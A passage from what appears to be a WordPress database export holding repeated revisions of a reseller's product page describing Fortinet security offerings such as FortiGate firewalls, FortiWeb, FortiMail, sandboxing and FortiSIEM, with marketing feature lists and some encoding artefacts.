300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:41:07','2019-09-30 03:41:07','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3556,1,'2019-09-30 11:44:40','2019-09-30 03:44:40','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n\r\n&nbsp;\r\n<h4><strong>Features and Benefits</strong></h4>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified 